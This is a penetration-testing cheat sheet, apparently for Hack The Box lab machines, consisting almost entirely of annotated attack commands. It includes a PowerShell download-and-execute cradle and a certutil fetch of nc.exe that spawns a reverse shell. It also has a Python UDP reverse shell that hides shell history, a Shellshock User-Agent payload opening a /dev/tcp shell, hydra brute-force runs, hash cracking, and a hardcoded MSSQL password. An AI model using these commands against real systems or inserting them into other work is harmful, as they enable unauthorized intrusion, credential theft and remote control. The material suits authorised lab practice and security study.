# SMB share enumeration against two hosts.
# NOTE(review): the shell concatenates `" "%" "` into the single argument ` % ` — a one-space
# username with a one-space password, not an empty one. For a null session the usual spelling
# is -U '%' (or -N, as on the next line); confirm which was intended before reusing.
smbclient -L 10.10.10.134 -U " "%" "
# -N: suppress the password prompt (anonymous / null-session share listing).
smbclient -N -L //10.10.10.125
Hidden streams (NTFS alternate data streams)
- List files with streams:
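:: List files together with their NTFS alternate data streams.
:: The switch is /R (forward slash); "dir \R" would just try to list a directory named \R.
dir /R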
- Read a stream from command line:
:: Dump the contents of the named alternate data stream by redirecting it into `more`.
:: NOTE(review): input redirection is used presumably because `type`/`more` refuse the
:: "file:stream" path as a direct argument — confirm on the target build.
more < FileName:StreamName
:: Running services together with the account each one starts under (startname);
:: services running as a named domain/local user rather than a built-in account are worth a closer look.
wmic service where started=true get name, startname
# In-memory download cradle: fetch the script text from the attacker-hosted web server
# (10.10.14.3:8000) and pass it straight to Invoke-Expression (IEX), so nothing is written to disk.
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.3:8000/Invoke-PowerShellTcp.ps1')
:: One-shot foothold chain:
::   1. net use /D /Y *            - drop every mapped network connection without confirmation
::   2. certutil -urlcache -split  - fetch nc.exe over HTTP into C:\Users\Public (presumably chosen
::                                   because standard users can write there)
::   3. nc.exe -e powershell.exe   - reverse shell back to 10.10.16.65:1234
:: NOTE(review): step 3 is joined with a single '&', so nc.exe is launched even if the certutil
:: download failed; use '&&' if the launch should depend on a successful download.
cmd.exe /C net use /D /Y * && cmd.exe /C certutil.exe -urlcache -split -f 'http://10.10.16.65/nc.exe' C:\Users\Public\nc.exe & C:\Users\Public\nc.exe 10.10.16.65 1234 -e powershell.exe
# Quick container check: PID 1's cgroup paths carry docker/lxc/kubepods-style names when running
# inside a container, whereas a bare host shows plain "/" entries (presumably why it is listed here).
cat /proc/1/cgroup
# DNS zone transfer (AXFR) for matis.htb against the nameserver at 10.10.10.52;
# if the server allows it, every record in the zone is returned.
dig axfr @10.10.10.52 matis.htb
# Recursively mirror an FTP server. No credentials are given, so wget logs in as anonymous;
# --no-passive forces active-mode data connections (e.g. when passive ports are filtered).
wget -r --no-passive ftp://10.10.10.106
# UDP listener on 4444 for the Python UDP reverse shell below; file:`tty`,echo=0,raw wires the
# local terminal to the connection so the remote shell is fully interactive.
- socat file:`tty`,echo=0,raw udp-listen:4444
# UDP reverse shell (pairs with the socat udp-listen above): spawn a child python that connects a
# SOCK_DGRAM socket to 10.10.16.28:1234, duplicates it onto stdin/stdout/stderr, points HISTFILE at
# /dev/null so nothing is written to shell history, and spawns /bin/sh in a pty.
import subprocess;subprocess.Popen(["python", "-c", 'import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\"10.10.16.28\", 1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn(\"/bin/sh\");s.close()'])
# Execute a remote script directly via process substitution. Security caveat: it is fetched over
# plain HTTP with no integrity check, so whatever the server (or anyone on the path) returns runs
# as the current user. The hostname here is a placeholder.
bash <(curl -s http://mywebsite.com/myscript.txt)
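# Locate a file by name anywhere on the filesystem. stderr is discarded so the
# "Permission denied" noise from unreadable directories does not clutter the output
# (same idiom as the getcap line below).
find / -type f -name "filename" 2>/dev/null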
# Enumerate file capabilities across the whole filesystem (privilege-escalation candidates,
# e.g. cap_setuid on an interpreter); errors from unreadable paths are suppressed.
getcap -r / 2>/dev/null
Fix private key permissions: `chmod 600 <key>` (ssh refuses a key that is group- or world-readable; `chmod 4000` would set only the setuid bit and strip all read/write permission, so it is wrong here).
# impacket's mssqlclient.py: connect to the MSSQL instance with Windows authentication as "reporting".
# The password is single-quoted so the shell does not expand "$c6".
# NOTE(review): cleartext credential stored in this cheat-sheet — redact before sharing.
mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
-- Effective permissions of the current login at server scope
-- (e.g. CONTROL SERVER or IMPERSONATE ANY LOGIN would be escalation paths).
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
-- Database inventory. NOTE(review): only databases the current login is allowed to see are listed.
SELECT name FROM master.sys.databases
# Fetch the server's TLS certificate chain (SNI set to the IP, stderr silenced) and print the
# first certificate in full; CN/SAN entries often reveal extra hostnames worth adding to /etc/hosts.
echo | openssl s_client -showcerts -servername 10.10.10.124 -connect 10.10.10.124:443 2>/dev/null | openssl x509 -inform pem -noout -text
# Walk the SNMP tree over v2c with the default community string "public".
# Output shows raw OIDs unless MIBs are installed and enabled (see the notes below).
snmpwalk -v 2c -c public 10.10.10.65
- apt install snmp-mibs-downloader
- comment out the `mibs :` line in
/etc/snmp/snmp.conf (so snmpwalk shows MIB names instead of raw OIDs)
# Build a target-specific wordlist by spidering the site; -e also collects email addresses,
# -a also pulls words from file metadata.
# NOTE(review): the output file is named cewl-forum.txt while the host is gorum.bart.htb —
# confirm the intended vhost.
cewl -w cewl-forum.txt -e -a http://gorum.bart.htb
# Brute-force the login form for the single user "admin" with rockyou. The text after the last ':'
# is the failure marker hydra looks for in the response; -f stops at the first valid pair,
# -Vv prints every attempt.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -Vv -f
# Password-only form: the username is irrelevant (hence the placeholder). HTTPS on 443 via
# https-post-form and -s 443; failure marker is "Incorrect password.".
hydra 10.10.10.43 -l whatever -P /opt/SecLists/Passwords/darkweb2017-top10000.txt https-post-form "/db/:password=^PASS^&remember=yes&login=log+in&proc_login=true:Incorrect password." -Vv -s 443
# Extract the crackable hash from the 7-Zip archive (john's 7z2john.pl).
/opt/john/run/7z2john.pl backup.7z > backup.hash
# Crack it with hashcat mode 11600 (7-Zip) in straight wordlist mode; results go to backup.cracked.
# NOTE(review): --force suppresses hashcat's device/driver warnings; drop it on a machine with a
# working OpenCL/CUDA setup so genuine problems are not hidden.
hashcat -m 11600 -a 0 -o backup.cracked backup.hash /usr/share/wordlists/rockyou.txt --force
# Virtual-host discovery: fuzz the Host header against the IP. --hc 400 hides HTTP 400 responses;
# --hh 73 hides responses with a 73-character body (presumably the default vhost's response —
# re-measure this value per target).
wfuzz -w /opt/SecLists/Discovery/DNS/subdomains-top1mil-110000.txt -u http://10.10.10.120/ -H 'Host: FUZZ.chaos.htb' --hh 73 --hc 400
# LDAP enumeration via nmap's ldap-search script; with no ldap.username/ldap.password arguments
# it binds anonymously and dumps whatever the directory exposes to unauthenticated clients.
nmap -p 389 --script ldap-search 10.10.10.119
# Watch for ICMP on the VPN interface — e.g. to confirm a blind command injection by having the
# target ping back to the attacker.
tcpdump -i tun0 icmp
# Shellshock (CVE-2014-6271) against a CGI script: the "() { :; };" function definition in the
# User-Agent header lands in the environment of a vulnerable bash and the trailing command runs —
# here an interactive bash reverse shell to 10.10.15.98:7777 via /dev/tcp. The two "echo" calls
# presumably emit the blank line that terminates the HTTP headers so the CGI response stays well-formed.
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.15.98/7777 0>&1 " http://10.10.10.56:80/cgi-bin/user.sh